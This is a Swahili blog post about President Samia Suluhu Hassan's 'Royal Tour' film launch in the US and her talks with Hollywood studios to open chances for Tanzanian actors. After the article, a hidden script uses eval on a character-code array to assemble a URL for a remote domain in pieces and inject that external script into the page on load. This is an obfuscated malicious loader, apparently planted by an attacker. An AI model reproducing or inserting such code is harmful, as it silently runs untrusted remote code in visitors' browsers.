Hivi karibuni Rais wa jamhuri ya muungano wa Tanzania mheshimiwa Samia Suluhu Hassan amekwenda kwenye ziara ya kikazi nchini marekani ili kufanya uzinduzi wa filamu yaani makala iitwayo “The Royal Tour” ambapo filamu hiyo imelenga kutangaza utalii ili kukuza pato la taifa letu.
Mategemeo ya mheshimiwa Rais ni kuitangaza Tanzania na Fursa zake vivutio,utamaduni na mengineyo ambayo yatawavutia watalii pamoja na wawekezaji mbalimbali hali itayopelekea maendeleo na kukua kwa uchumi wa taifa kiujumla.
Aidha licha ya kufanya uzinduzi huo pia mheshimiwa alifanya mahojiano na kituo kimoj cha televisheni marekani pamoja na waandishi wa habari marekani ambapo aliongea mengi ikiwemo fursa alizozitengeneza huko kwa wananchi wa Tanzania na hii ni baada ya kuulizwa swali na mwanamke mtanzania aitwaye Maria aliyeuliza “yeye kama kijana wa kitanzania ambaye ni mwigizaji anayetamani kuitanga zaidi nchi je serikali inamsaidiaje na ina mikakati gani juu ya hilo?” ambapo alijibu kuwa anafanya mazungumzo na makampuni ya filamu marekani ili kuwaunganisha watanzania huko ambapo amezungumza na makampuni matano makubwa na kwa sasa anazungumza na Paramount ambayo itafanya hivyo karibuni tu.
Kiukweli hii ni fursa kubwa sana kwa watanzania hasa upande wa sanaa na upande wa filamu kwa kuwa uwepo wa ushirikiano na makampuni makubwa ya filamu kutafanya watanzania kupata fursa ya kufahamika na kukuza vipaji vyao na kupata mafanikio na uchumi wao kuongezeka japo cha msingi na cha kuzingatia ni mchakato wa kuwapata wenye vipaji kweli hapa ndipo patafanya kutoa zao la kweli au laah. sasa kinachotakiwa wachaguliwe watu wenye vpaji na uwezo kweli ili kuhakikisha taifa linazidi kupata mafanikio na kutangazwa zaidi.
Hivyo basi ewe kijana tazama kipaji chako changamkia fursa ndo zimeanza kuonekana lakini pia serikali iandae mbinu za kuitanza zaidi nchi yetu maana bado filamu pekee haitoshi maana ushindani ni mkubwa sana.
Mama Samia Aipa Bongo movie Neema ya Kuingia Hollywood
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments